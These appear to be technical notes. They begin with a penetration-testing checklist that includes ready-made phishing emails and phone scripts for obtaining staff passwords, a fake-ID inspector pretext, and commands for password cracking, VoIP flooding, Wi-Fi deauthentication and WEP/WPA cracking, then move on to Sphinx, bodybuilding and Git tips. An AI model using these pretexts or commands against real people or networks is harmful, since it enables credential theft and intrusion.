MetaData Visualisation Sites TouchGraph Google Browser Kar- too Tools Bashitsu svn checkout http://bashitsu.googlecode.com/svn/ trunk/ cat filename | strings | bashitsu-extract-names Bintext Exif Tool exiftool -common directory exiftool -r -w .txt -common directory FOCA Online Version Offline Hachoir Infocrobes Libextractor extract -b filename extract filename extract -B coun- try_code filename Metadata Extraction Tool extract.bat Metagoofil metagoofil -d target_domain -l max_no_of_files -f all ( or pdf,doc,xls,ppt) -o output_file.html -t direc- tory_to_download_files_to OOMetaExtractor The Revisionist


./therev ‘’ @/directory ./therev ‘’ site.com ./therev ‘linux’ microsoft.com en Wvware Wikipedia Metadata Search Wikiscanner Wikipedia username checker Social/ Business Networks The following sites are some of many social and business related network- ing entities that are in use today. Dependant on the interests of the people you are researching it may be worth just exploring sites that they have a particular penchant based on prior knowledge from open source research, company biographies etc. i.e. Buzznet if they are interested in music/ pop culture, Flixter for movies etc. Finding a persons particular interests may make a potential client side attack more successful if you can find a related “hook” in any potential “spoofed” email sent for them to click on (A Spearphishing technique) Note: - This list is not exhaustive and has been limited to those with over 1 million members.

Africa BlackPlanet Australia Bebo Belgium Netlog Holland Hyves Hungary iWiW Iran Cloob Japan Mixi Korea CyWorld Poland Grono Nasza-klasa Russia Odnoklassniki Vkontakte Sweden LunarStorm UK FriendsReunited et al Badoo FaceParty US Classmates Facebook Friendster MyLife.com (formerly Re- union.com) MySpace Windows Live Spaces Assorted Buzznet Care2 Habbo Hi5 Linkedin MocoSpace Naymz Passado Tagged Twitter Windows Live Spaces Xanga Ya- hoo! 360° Xing http://www.xing.com/app/search?op=universal& universal=???? Resources OSINT International Directory of Search Engines DNS Record Retrieval from publically available servers Types of Information Records SOA Records - Indicates the server that has author- ity for the domain. MX Records - List of a host’s or domain’s mail exchanger server(s). NS Records - List of a host’s or domain’s name server(s). A Records


- An address record that allows a computer name to be translated to an IP ad- dress. Each computer has to have this record for its IP address to be located via DNS. PTR Records - Lists a host’s domain name, host identified by its IP address. SRV Records - Service location record. HINFO Records - Host infor- mation record with CPU type and operating system. TXT Records - Generic text record. CNAME - A host’s name allows additional names/ aliases to be used to locate a computer. RP - Responsible person for the domain. Database Settings Version.bind Serial Refresh Retry Expiry Minimum Sub Domains Internal IP ranges Reverse DNS for IP Range Zone Transfer Social Engineering Remote Phone Scenarios IT Department.”Hi, it’s Zoe from the helpdesk. I am doing a security audit of the networkand I need to re-synchronise the Active Directory usernames and passwords.This is so that your logon process in the morning receives no undue delays”If you are calling from a mo- bile number, explain that the helpdesk has beenissued a mobile phone for ‘on call’ personnel. Results Contact Details Name Phone number Email Room number Department Role Email Scenarios Hi there, I am currently carrying out an Active Directory Health Checkfor TARGET COMPANY and require to re-synchronise some outstandingaccounts on behalf of the IT Service Desk. Please reply to medetailing the username and password you use to logon to your desktopin the morning. I have checked with MR JOHN DOE, the IT SecurityAdvisor and he has authorised this request. I will then popu- late thedatabase with your account details ready for re-synchronisation withActive Directory such that replication of your account will bere- established (this process is transparent to the user and sorequires no further action from yourself). We hope that this exercisewill reduce the time it takes for some users to logon to the network.Best Regards, An- drew Marks Good Morning,The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this ‘opportunity’ to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.If you wish to retain your current creden- tials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for


your continued patience and help.Kindest regards,leeEMAIL SIGNA- TURE Software Results Contact Details Name Phone number Email Room number Department Role Other Local Personas Name Suggest same 1st name. Phone Give work mobile, but remember they have it! Email Have a suitable email address Business Cards Get cards printed Contact Details Name Phone number Email Room number Department Role Scenarios New IT employee New IT employee.”Hi, I’m the new guy in IT and I’ve been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don’t they? Can you help me out on this?”Get the following information, try to put a “any prob- lems with it we can help with?” slant on it.UsernameDomainRemote access (Type - Modem/VPN)Remote email (OWA)Most used soft- ware?Any comments about the network?Any additional software you would like?What do you think about the security on the network? Password complexity etc.Now give reasons as to why they have com- plexity for passwords, try and get someone to give you their password and explain how you can make it more secure.”Thanks very much and you’ll see the results on the company boards soon.” Fire Inspector Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the work- place.Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).Check for:number of fire extinguishers, pressure, type.Fire exits, accessibility etc.Look for any information you can get. Try to get on your own, without supervision! Results Maps Satalitte Imagery Building layouts Other Dumpster Diving Rubbish Bins Contract Waste Removal Ebay ex-stock sales i.e. HDD Web Site copy htttrack teleport pro Black Widow Password cracking Rainbow crack ophcrack rainbow tables rcrack c:rainbowcrack*.rt -f pwfile.txt Ophcrack Cain & Abel John the Ripper


./unshadow passwd shadow > file_to_crack ./john -single file_to_crack ./john - w=location_of_dictionary_file -rules file_to_crack ./john -show file_to_crack ./john –incre- mental:All file_to_crack fgdump fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt pwdump6 pwdump [-h][-o][-u][-p] machineName medusa LCP L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada Domain credentials Sniffing pwdump import sam import aiocracker aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list VoIP Security Sniffing Tools AuthTool Cain & Abel Etherpeek NetDude Oreka PSIPDump SIPomatic SIPv6 Analyzer UCSniff VoiPong VOMIT Wireshark WIST - Web Interface for SIP Trace Scanning and Enumeration Tools enumIAX fping IAX Enumerator iWar Nessus Nmap SIP Forum Test Framework (SFTF) SIPcrack sipflanker python sipflanker.py 192.168.1-254 SIP-Scan SIP.Tastic SIPVicious SiVuS SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address snmpwalk VLANping VoIPAudit VoIP GHDB Entries VoIP Voicemail Database Packet Creation and Flooding Tools H.323 Injection Files H225regreject IAXHangup IAXAuthJack IAX.Brute IAXFlooder ./iaxflood sourcename destinationname numpackets INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets kphone-ddos RTP Flooder rtpbreak Scapy Seagull SIPBomber SIPNess SIPp SIPsak Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain SIP-Send-Fun SIPVicious Spitter TFTP Brute Force perl tftpbrute.pl <filelist> UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets Voiphopper Fuzzing Tools Asteroid Codenomicon VoIP Fuzzers Fuzzy Packet Mu Security VoIP Fuzzing Platform ohrwurm RTP Fuzzer PROTOS H.323 Fuzzer PROTOS SIP Fuzzer SIP Forum Test Framework (SFTF) Sip-Proxy Spirent ThreatEx Signaling Manipulation Tools AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v BYE Teardown Check Sync Phone Rebooter RedirectPoison


./redirectpoison interface target_source_ip target_source_port “” Registration Adder Registration Eraser Registration Hijacker SIP-Kill SIP-Proxy-Kill SIP- RedirectRTP SipRogue vnak Media Manipulation Tools RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip des- tination_rtp_port file RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip desti- nation_rtp_port file RTPProxy RTPInject Generic Software Suites OAT Office Communication Server Tool Assessment EnableSecurity VOIP- PACK Note: - Add-on for Immunity Canvas References URL’s Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information re- lating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi? keyword=voip Default Passwords Hacking Exposed VoIP Tool Pre-requisites Hack Library g711conversions VoIPsa White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implemen- tations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP) Vulnerability Assessment Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

Manual Patch Levels Confirmed Vulnerabilities Severe High Medium Low Automated Reports Vulnerabilities Severe High Medium Low Tools GFI Nessus (Linux) Nessus (Windows) NGS Typhon NGS Squirrel for Oracle NGS Squirrel for SQL SARA MatriXay BiDiBlah SSA Oval Interpreter Xscan Security Manager + Inguma Resources Security Focus Microsoft Security Bulletin Common Vulnerabilities and Exploits (CVE) National Vulnerability Database (NVD) The Open Source Vulnerability Database (OSVDB) Standalone Database Update URL


United States Computer Emergency Response Team (US-CERT) Computer Emergency Re- sponse Team Mozilla Security Information SANS Securiteam PacketStorm Security Security Tracker Secunia Vulnerabilities.org ntbugtraq Wireless Vulnerabilities and Exploits (WVE) Blogs Carnal0wnage Fsecure Blog g0ne blog GNUCitizen ha.ckers Blog Jeremiah Grossman Blog Metasploit nCircle Blogs pentest mokney.net Rational Security Rise Security Security Fix Blog Software Vulnerability Exploitation Blog Taosecurity Blog Wireless Penetration Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

Site Map RF Map Lines of Sight Coverage Standard Antenna Directional Antenna Physical Map Triangulate APs Satellite Imagery Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP Key Length Crack Time Key WPA/PSK TKIP Temporal Key Integrity Protocol, (TKIP), is an encryption protocol desgined to replace WEP Key Attack Time AES Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data. Key Attack Time 802.1x Derivative of 802.1x in use Access Points ESSID Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point Broadcast ESSIDs BSSIDs Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks. Vendor Channel Associations Rogue AP Activity Wireless Clients MAC Addresses Vendor Operating System Details Adhoc Mode Associations Intercepted Traffic Encrypted Clear Text Wireless Toolkit Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE karma Kismet MiniStumbler Netstumbler Wellenreiter Wifi Hopper WirelessMon


Packet Capture Airopeek Airtraf Apsniff Cain Wireshark EAP Attack tools eapmd5pass eapmd5pass -w dictionary_file -r eapmd5-capture.dump eapmd5pass -w dictionary_file -U username -C EAP-MD5 Chal- lengevalue -R EAP_MD5_Response_value -E 2 EAP-MD5 Response EAP ID Value i.e. -C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2 Leap Attack Tools asleap thc leap cracker anwrap WEP/ WPA Password Attack Tools Aircrack-ptw Aircrack-ng Airsnort cowpatty wep attack wep crack Airbase wzcook Frame Generation Software Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap wifitap -b [-o ] [-i [-p] [-w [-k ]] [-d [-v]] [-h] FreeRADIUS - Wireless Pwnage Edition Mapping Software Knsgem File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet WLAN discovery Unencrypted WLAN Visible SSID Sniff for IP range MAC authorised MAC filtering Spoof valid MAC Linux ifconfig [interface] hw ether [MAC] macchanger Random Mac Address:- macchanger -r eth0 mac address changer for windows madmacs TMAC SMAC Hidden SSID Deauth client Aireplay-ng aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface] Commview Tools > Node reassociation Void11 void11_penetration wlan0 -D -t 1 -B [MAC] WEP encrypted WLAN Visible SSID WEPattack wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network] Capture / Inject packets Break WEP


Aircrack-ptw aircrack-ptw [pcap file] Aircrack-ng aircrack -q -n [WEP key length] -b [BSSID] [pcap file] Airsnort Channel > Start WEPcrack perl WEPCrack.pl ./pcap-getIV.pl -b 13 -i wlan0 Hidden SSID Deauth client Aireplay-ng aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface] Commview Tools > Node reassociation Void11 void11_hopper void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID] WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake WPA / WPA 2 dictionary attack coWPAtty ./cowpatty -r [pcap file] -f [wordlist] -s [SSID] ./genpmk -f dic- tionary_file -d hashfile_name -s ssid ./cowpatty -r cature_file.cap -d hashfile_name -s ssid Aircrack-ng aircrack-ng -a 2 -w [wordlist] [pcap file] LEAP encrypted WLAN Deauth client Break LEAP asleap ./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash file.dat -n output_index_filename.idx ./genkeys -r dictionary_file -f out- put_pass+hash file.dat -n output_index_filename.idx THC-LEAPcracker leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge] 802.1x WLAN Create Rogue Access Point Airsnarf Deauth client Associate client Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate fake ap perl fakeap.pl –interface wlan0 perl fakeap.pl –interface wlan0 –channel 11 –essid fake_name –wep 1 –key [WEP KEY] Hotspotter Deauth client Associate client


Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate Karma Deauth client Associate client Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate ./bin/karma etc/karma-lan.xml Linux rogue AP Deauth client Associate client Compromise client Acquire passphrase / certificate wzcook Obtain user’s certificate Resources URL’s Wirelessdefence.org Russix Wardrive.net Wireless Vulnerabilities and Exploits (WVE) White Papers Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware- Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information re- lating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi? keyword=wireless Penetration Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

Password Attacks Known Accounts Identified Passwords Unidentified Hashes Default Accounts Identified Passwords Unidentified Hashes Exploits Successful Exploits Accounts Passwords Cracked Uncracked Groups Other Details Services Backdoor Connectivity Unsuccessful Exploits Resources Securiteam Exploits are sorted by year and must be downloaded individually SecurityForest Updated via CVS after initial install


GovernmentSecurity Need to create and account to obtain access Red Base Security Oracle Exploit site only Wireless Vulnerabilities & Exploits (WVE) Wireless Exploit Site PacketStorm Security Exploits downloadable by month and year but no index- ing carried out. SecWatch Exploits sorted by year and month, download seperately SecurityFocus Exploits must be downloaded individually Metasploit Install and regualrly update via svn Milw0rm Exploit archived indexed and sorted by port download as a whole - The one to go for! Tools Metasploit Free Extra Modules local copy Manual SQL Injection Understanding SQL Injection SQL Injection walkthrough SQL In- jection by example Blind SQL Injection Advanced SQL Injection in SQL Server More Advanced SQL Injection Advanced SQL Injection in Oracle databases SQL Cheat- sheets http://ha.ckers.org/sqlinjection http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ http://www.0x000000.com/?i=14 http://pentestmonkey.net/ SQL Power Injector SecurityForest SPI Dynamics WebInspect Core Impact Cisco Global Exploiter PIXDos perl PIXdos.pl [ –device=interface ] [–source=IP] [–dest=IP] [–sourcemac=M AC] [–destmac=MAC] [–port=n] CANVAS Inguma


CHAPTER 49

Metasploit

Contents:

49.1 Tips

49.1.1 APDU command to get smart card UID

from smartcard.scard import *

hresult, hcontext = SCardEstablishContext(SCARD_SCOPE_USER)
assert hresult == SCARD_S_SUCCESS
hresult, readers = SCardListReaders(hcontext, [])
assert len(readers) > 0
reader = readers[0]
hresult, hcard, dwActiveProtocol = SCardConnect(
    hcontext, reader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_T0 | SCARD_PROTOCOL_T1)
# 0xFF 0xCA 0x00 0x00 0x00 is the Get Data APDU that asks the reader for the card UID
hresult, response = SCardTransmit(hcard, dwActiveProtocol, [0xFF, 0xCA, 0x00, 0x00, 0x00])
print(response)

https://stackoverflow.com/a/26689054
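The returned list is the UID bytes followed by the status words SW1/SW2. A small follow-up sketch (assuming a successful 0x90 0x00 status) to print the UID as a hex string:

sw1, sw2 = response[-2], response[-1]
if (sw1, sw2) == (0x90, 0x00):
    # Everything before the status words is the card UID
    uid = ''.join('{:02X}'.format(b) for b in response[:-2])
    print(uid)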


CHAPTER 50

Sphinx

Contents:

50.1 Tips

50.1.1 How do we embed images in sphinx docs?

.. image:: example.png
   :width: 480pt

The path to the image is relative to the file. http://sphinx-doc.org/rest.html?highlight=image#images http://openalea.gforge.inria.fr/doc/openalea/doc/_build/html/source/sphinx/rest_syntax.html#directives

50.1.2 Document your Django projects: reStructuredText and Sphinx http://www.marinamele.com/2014/03/document-your-django-projects.html

50.1.3 Generating Code Documentation With Pycco

$ pip install pycco
$ cd to/root/of/project
$ pycco **/*.py -p -i

https://realpython.com/blog/python/generating-code-documentation-with-pycco/


50.1.4 First Steps with Sphinx

$ pip install Sphinx
$ sphinx-quickstart

http://www.sphinx-doc.org/en/stable/tutorial.html
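After sphinx-quickstart generates the project skeleton, the HTML output can typically be built with the generated Makefile (a sketch; the source/ and build/ paths assume the default answers to the quickstart prompts):

$ make html
# or invoke the builder directly:
$ sphinx-build -b html source/ build/html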

50.2 Links

CHAPTER 51

Sport

Contents:

51.1 Body Building

51.1.1 Natural body building

http://en.wikipedia.org/wiki/Natural_bodybuilding
http://www.true-natural-bodybuilding.com/training.html
http://en.wikipedia.org/wiki/Performance-enhancing_drugs

hypertrophy, doping (anabolic steroids, growth hormone, insulin)


CHAPTER 52

Version Control System

Contents:

52.1 Git https://github.com/k88hudson/git-flight-rules

52.1.1 Set push.default

warning: push.default is unset; its implicit value has changed in Git 2.0 from 'matching' to 'simple'.

To squelch this message and maintain the traditional behavior, use:

git config --global push.default matching

To squelch this message and adopt the new behavior now, use:

git config --global push.default simple

When push.default is set to 'matching', git will push local branches to the remote branches that already exist with the same name. Since Git 2.0, Git defaults to the more conservative 'simple' behavior, which only pushes the current branch to the corresponding remote branch that 'git pull' uses to update the current branch. See 'git help config' and search for 'push.default' for further information. (The 'simple' mode was introduced in Git 1.7.11. Use the similar mode 'current' instead of 'simple' if you sometimes use older versions of Git.)

$ git config --global push.default simple


52.1.2 Untrack and stop tracking files in git

$ git rm -r --cached .

52.1.3 Create new git project in bitbucket

$ mkdir /path/to/your/new_project

$ cd /path/to/your/new_project

$ git init

$ git remote add origin [email protected]:omidraha/new_project.git

$ git push -u origin master

52.1.4 Remove local (untracked) files from current Git branch http://git-scm.com/docs/git-clean http://stackoverflow.com/questions/61212/remove-local-untracked-files-from-my-current-git-branch

$ git clean

# If the Git configuration variable clean.requireForce is not set to false,
# git clean will refuse to run unless given -f, -n or -i.
$ git clean -f

# Remove untracked directories in addition to untracked files.
$ git clean -f -d    # git clean -fd

# Remove only files ignored by Git.
# This may be useful to rebuild everything from scratch, but keep manually created files.
$ git clean -f -X    # git clean -fX

52.1.5 Install Git

$ sudo apt-get install git-core
$ git --version

52.1.6 Configure Git https://github.com/yui/yui3/wiki/Set-Up-Your-Git-Environment

$ git config --global user.name "Omid Raha"
$ git config --global user.email [email protected]

$ vim ~/.gitconfig



[user]
    name = Omid Raha
    email = [email protected]
[push]
    default = simple
[core]
    autocrlf = input
[alias]
    st = status
    ci = commit
    co = checkout
    br = branch

$ vim ~/.gitignore

.DS_Store
._*
.svn
.hg
.*.swp

52.1.7 git commit as different user

$ git commit --author="Name <email>" -m "whatever"

52.1.8 Setting your username and email in Git

https://help.github.com/articles/setting-your-username-in-git/
https://help.github.com/articles/setting-your-email-in-git/

Git uses your username and email address to associate commits with an identity. The git config command can be used to change your Git configuration, including your username and email address. It takes two arguments:

• The setting you want to change, in this case user.name or user.email
• The new value, for example "Billy Everyteen" or [email protected]

To set your username and email for a specific repository

Enter the following command in the root folder of your repository:

# Set a new name $ git config user.name "Billy Everyteen"

# Set a new email $ git config user.email "[email protected]"

# Verify the new name
$ git config user.name
# Billy Everyteen



# Verify the new email
$ git config user.email
# [email protected]

To set your username and email for every repository on your computer

Navigate to your repository from a command-line prompt. Set your username and email with the following command.

$ git config --global user.name "Billy Everyteen"
$ git config --global user.email "[email protected]"

Confirm that you have set your username and email correctly with the following command.

$ git config --global user.name
# Billy Everyteen

$ git config --global user.email
# [email protected]

To set your username and email for a single repository

Navigate to your repository from a command-line prompt. Set your username and email with the following command.

$ git config user.name "Billy Everyteen"
$ git config user.email "[email protected]"

Confirm that you have set your username and email correctly with the following command.

$ git config user.name
# Billy Everyteen

$ git config user.email
# [email protected]

52.1.9 Setting up a git server

http://git-scm.com/book/en/v2/Git-on-the-Server-Setting-Up-the-Server

Let's walk through setting up SSH access on the server side. In this example, you'll use the authorized_keys method for authenticating your users. We also assume you're running a standard Linux distribution like Ubuntu. First, you create a git user and a .ssh directory for that user.

$ sudo adduser git
$ su git
$ cd
$ mkdir .ssh && chmod 700 .ssh
$ touch .ssh/authorized_keys && chmod 600 .ssh/authorized_keys


Next, you need to add some developer SSH public keys to the authorized_keys file for the git user. Let’s assume you have some trusted public keys and have saved them to temporary files. Again, the public keys look something like this:

$ cat /tmp/id_rsa.john.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCB007n/ww+ouN4gSLKssMxXnBOvf9LGt4LojG6rs6hPB09j9R/T17/x4lhJA0F3FR1rP6kYBRsWj2aThGw6HXLm9/5zytK6Ztg3RPKK+4kYjh6541NYsnEAZuXz0jTTyAUfrtU3Z5E003C4oxOj6H0rfIF1kKI9MAQLMdpGW1GYEIgS9EzSdfd8AcCIicTDWbqLAcU4UpkaX8KyGlLwsNuuGztobF8m72ALC/nLF6JLtPofwFBlgc+myivO7TCUSBdLQlgMVOFq1I2uPWQOkOWQAHukEOmfjy2jctxSDBQ220ymjaNsHT4kgtZg2AYYgPqdAv8JggJICUvax2T9va5 gsg-keypair

You just append them to the git user’s authorized_keys file in its .ssh directory:

$ cat /tmp/id_rsa.john.pub >> ~/.ssh/authorized_keys

Now, you can set up an empty repository for them by running git init with the –bare option, which initializes the repository without a working directory:

$ cd /path/to/prj
$ git init --bare sample_prj.git

Then, John, Josie, or Jessica can push the first version of their project into that repository by adding it as a remote and pushing up a branch. Note that someone must shell onto the machine and create a bare repository every time you want to add a project.

# on John's computer
$ cd myproject
$ git init
$ git add .
$ git commit -m 'initial commit'
$ git remote add origin git@gitserver:/path/to/prj/sample_prj.git
$ git push origin master

At this point, the others can clone it down and push changes back up just as easily:

$ git clone git@gitserver:/path/to/prj/sample_prj.git
$ cd project
$ vim README
$ git commit -am 'fix for the README file'
$ git push origin master

52.1.10 How do you discard unstaged changes in Git?

$ git checkout -- .

http://stackoverflow.com/questions/52704/how-do-you-discard-unstaged-changes-in-git

52.1.11 Working on github API

$ pip install pygithub3


from pygithub3 import Github

g = Github()
repo = g.repos.get('django', 'django')

52.1.12 Find good forks on GitHub http://forked.yannick.io http://forked.yannick.io/django/django

52.1.13 IDE http://www.syntevo.com/smartgit/download

52.1.14 Undo changes in one file

$ git checkout /path/of/changed/file

52.1.15 List local and remote branches

$ git branch -a

52.1.16 List remote branches

$ git branch -r

52.1.17 List only local branches

$ git branch

With no arguments, existing branches are listed and the current branch will be highlighted with an asterisk.
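For example (branch names are illustrative; the asterisk marks the currently checked-out branch):

$ git branch
  dev
* master
  rc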

52.1.18 Delete a Git branch both locally and remotely

To remove a local branch from your machine:

$ git branch -d <branch_name>

The -D flag force-deletes; -d gives you a warning if the branch is not already merged in (see the example at the end of this section). To remove a remote branch from the server:

# As of Git v1.7.0, you can delete a remote branch using
$ git push origin --delete <branch_name>
# which is easier to remember than
$ git push origin :<branch_name>

http://stackoverflow.com/a/2003515
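As noted above, -d refuses to delete a branch that has not been merged yet; a hypothetical run (branch name and exact wording are illustrative and vary between Git versions):

$ git branch -d feature-x
# error: The branch 'feature-x' is not fully merged.
$ git branch -D feature-x
# Deleted branch feature-x (was 3a2b1c0).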

52.1.19 Merge a git branch into master

$ git checkout master
$ git merge <branch_name>

52.1.20 Remove last commit from remote git repository

$ git pull
# use `git update-ref -d HEAD` instead, if it's the initial git commit
$ git reset HEAD^
# now some committed files become unstaged
# we can do git checkout for those files
# force-push the new HEAD commit
$ git push origin +HEAD

http://stackoverflow.com/questions/8225125/remove-last-commit-from-remote-git-repository
https://stackoverflow.com/a/6637891

$ git stash
$ git status
$ git stash list
$ git stash apply

https://git-scm.com/book/en/v1/Git-Tools-Stashing

52.1.21 Undo the last commit from local

git reset --soft HEAD~

http://stackoverflow.com/a/927386

52.1.22 Revert to specific commit

git reset 56e05fced        # resets index to former commit; replace '56e05fced' with your commit code
git reset --soft HEAD@{1}  # moves pointer back to previous HEAD
git commit -m "Revert to 56e05fced"
git reset --hard           # updates working copy to reflect the new commit
git push

52.1.23 19 Tips For Everyday Git Use http://www.alexkras.com/19-git-tips-for-everyday-use/


52.1.24 How to Write a Git Commit Message http://chris.beams.io/posts/git-commit/ https://gist.github.com/adeekshith/cd4c95a064977cdc6c50

52.1.25 Adding an existing project to GitHub using the command line

First create a new repository from the GitHub website, then:

git remote add origin https://github.com/<username>/<repository>.git
git push -u origin master

Also, if the project does not exist on your local machine, create it with:

echo "# <repository>" >> README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://github.com/<username>/<repository>.git
git push -u origin master

52.1.26 Add tag https://git-scm.com/book/en/v2/Git-Basics-Tagging

Listing Your Tags

Listing the available tags in Git is straightforward. Just type git tag:

$ git tag
v0.1
v1.3

Annotated Tags

Creating an annotated tag in Git is simple. The easiest way is to specify -a when you run the tag command:

$ git tag -a v1.4 -m "my version 1.4"
$ git tag
v0.1
v1.3
v1.4

Lightweight Tags

Another way to tag commits is with a lightweight tag. This is basically the commit checksum stored in a file – no other information is kept. To create a lightweight tag, don’t supply the -a, -s, or -m option:


$ git tag v1.4-lw
$ git tag
v0.1
v1.3
v1.4
v1.4-lw
v1.5
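A quick way to see the difference between the two tag types (tag names reuse the examples above):

# 'git show' on an annotated tag prints the tagger, date and message before
# the commit it points to; on a lightweight tag it prints only the commit.
$ git show v1.4
$ git show v1.4-lw
# 'git cat-file -t' makes the object type explicit:
$ git cat-file -t v1.4     # tag
$ git cat-file -t v1.4-lw  # commit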

52.1.27 Tag an older commit in Git?

git tag -a v1.2 9fceb02 -m "Message here"

52.1.28 Push a tag to a remote repository

$ git push --follow-tags

http://stackoverflow.com/questions/5195859/push-a-tag-to-a-remote-repository-using-git

52.1.29 Remove (delete) a tag

# delete the remote tag
$ git push --delete origin tag_name
# delete the local tag
$ git tag --delete tag_name

52.1.30 Github “fatal: remote origin already exists” http://stackoverflow.com/a/10904450

$ git remote set-url origin [email protected]:ppreyer/first_app.git

52.1.31 Install specific git commit with pip

$ cat requirements.txt
git+https://github.com/Tivix/django-rest-auth.git@976b3bbe4dded03552218c1022ee95d8bdf1176c

$ pip install -r requirements.txt
# It's a warning, not an error:
# Could not find a tag or branch '976b3bbe4dded03552218c1022ee95d8bdf1176c', assuming commit.

https://pip.pypa.io/en/stable/reference/pip_install/#git

52.1.32 Rewriting the most recent commit message


$ git commit --amend
$ git push --force

https://help.github.com/articles/changing-a-commit-message/

52.1.33 git subtrees

$ cd /to/root/of/one/project/
$ git remote add sub-prj [email protected]:omidraha/sub-prj.git
$ git subtree add --prefix=src/sub-prj sub-prj dev

To update subtree project:

$ cd /to/root/of/one/project/
$ git subtree pull -P src/sub-prj sub-prj dev

https://medium.com/@v/git-subtrees-a-tutorial-6ff568381844#.b923kyieb
http://stackoverflow.com/questions/18661894/git-updating-subree-how-can-i-update-my-subtree

52.1.34 Git fetch remote branch

Checkout to a new remote branch that exists only on the remote, but not locally

$ git fetch origin

http://stackoverflow.com/a/16608774

52.1.35 Sample release

Add tag and merge dev to master:

git checkout dev
git pull
git tag -a 2.0.1 -m "2.0.1"
git push --follow-tags
git checkout master
git pull
git merge dev
git push --follow-tags
git checkout dev

52.1.36 Warning: push.default is unset; its implicit value is changing in Git 2.0

warning: push.default is unset; its implicit value is changing in Git 2.0 from 'matching' to 'simple'. To squelch this message and maintain the current behavior after the default changes, use:

git config --global push.default matching

To squelch this message and adopt the new behavior now, use:


git config --global push.default simple

matching means git push will push all your local branches to the ones with the same name on the remote. This makes it easy to accidentally push a branch you didn't intend to.
simple means git push will push only the current branch to the one that git pull would pull from, and also checks that their names match. This is a more intuitive behavior, which is why the default is getting changed to this.

https://stackoverflow.com/a/13148313
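To check which value is currently in effect (prints nothing if the option is still unset):

$ git config --global --get push.default
# simple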

52.1.37 Fatal: The upstream branch of your current branch does not match the name of your current branch

git checkout rc
git push
